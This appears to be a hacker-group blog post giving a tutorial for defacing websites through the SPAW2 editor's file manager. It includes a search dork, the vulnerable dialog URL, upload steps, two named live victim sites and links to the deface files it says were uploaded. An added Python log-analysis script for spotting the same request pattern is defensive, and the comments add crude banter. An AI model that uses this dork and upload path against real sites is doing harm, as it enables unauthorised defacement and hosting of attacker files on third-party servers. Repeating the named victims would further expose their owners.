1. Phone/PC
2. Data quota (required)
3. Jembud (required)
4. Dork:
** inurl:"spaw2/upload/files/"
5. Deface script.
** ext: .txt / .html
6. Exploit:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Steps:
1. Do your dorking as usual, dog.
2. Once you have found one, enter the exploit, as shown below.
www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
or
www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
"vuln"
3. Find the text "image", click it, and change it to "file".
"select Files"
4. Then choose a file and upload it.
5. Find the file, then find the text "download file".
6. Click that; it opens automatically in a new tab.
That's it, done.
Live Target
1. http://www.leanimages.net/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
2. https://www.fem.gr/input/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Result?
1. https://www.fem.gr/input/spaw2/uploads/files/duar.txt
2. https://www.leanimages.net/admin/spaw2/uploads/files/vvibu.html
#LightCyberIndo
#penulis_./Misetya
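For defenders, the request pattern in this post can be searched for in web server access logs. The following is an added example, not part of the original post: it assumes Combined Log Format, and the function names, IP addresses, file names and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# .txt/.html files served from the SPAW2 upload directory named in the post
UPLOADED_RE = re.compile(r"/spaw2/uploads?/files/[^/]+\.(?:txt|html?)$", re.I)

# Constructed sample log lines (documentation IP ranges, made-up file names)
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&type=files HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:40 +0000] "POST /admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&type=files HTTP/1.1" 200 5300',
    '203.0.113.7 - - [01/Jan/2024:10:01:05 +0000] "GET /admin/spaw2/uploads/files/sample.html HTTP/1.1" 200 412',
    '198.51.100.20 - - [01/Jan/2024:10:02:00 +0000] "GET /admin/spaw2/uploads/files/brochure.txt HTTP/1.1" 200 900',
    '198.51.100.20 - - [01/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

def classify(target):
    """Return 'filemanager', 'uploaded_file' or None for a request target."""
    parts = urlsplit(target)
    if parts.path.lower().endswith("/spaw2/dialogs/dialog.php"):
        if "spawfm" in parse_qs(parts.query).get("module", []):
            return "filemanager"
    if UPLOADED_RE.search(parts.path):
        return "uploaded_file"
    return None

def find_suspects(lines):
    """Return {client_ip: [(time, kind, target), ...]} for clients that
    reached the file manager and afterwards fetched an uploaded file."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, _method, target, status = m.groups()
        kind = classify(target)
        if kind and status.startswith("2"):  # only successful requests
            hits.setdefault(ip, []).append((ts, kind, target))
    suspects = {}
    for ip, events in hits.items():
        kinds = [k for _, k, _ in events]
        if "filemanager" in kinds and "uploaded_file" in kinds[kinds.index("filemanager"):]:
            suspects[ip] = events
    return suspects

if __name__ == "__main__":
    for ip, events in find_suspects(SAMPLE_LOG).items():
        print(ip, [kind for _, kind, _ in events])
```

A client that only downloads an existing file from the upload directory is not flagged; the correlation requires a successful file-manager request first.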
5 Comments
test :v
Hey jembud, where's my nick, puki
Here, your nick is there
https://www.leanimages.net/admin/spaw2/uploads/files/vvibu.html
How about a jerking-off tutorial for once, bro ./Frin4 Id.
Who wants to visit?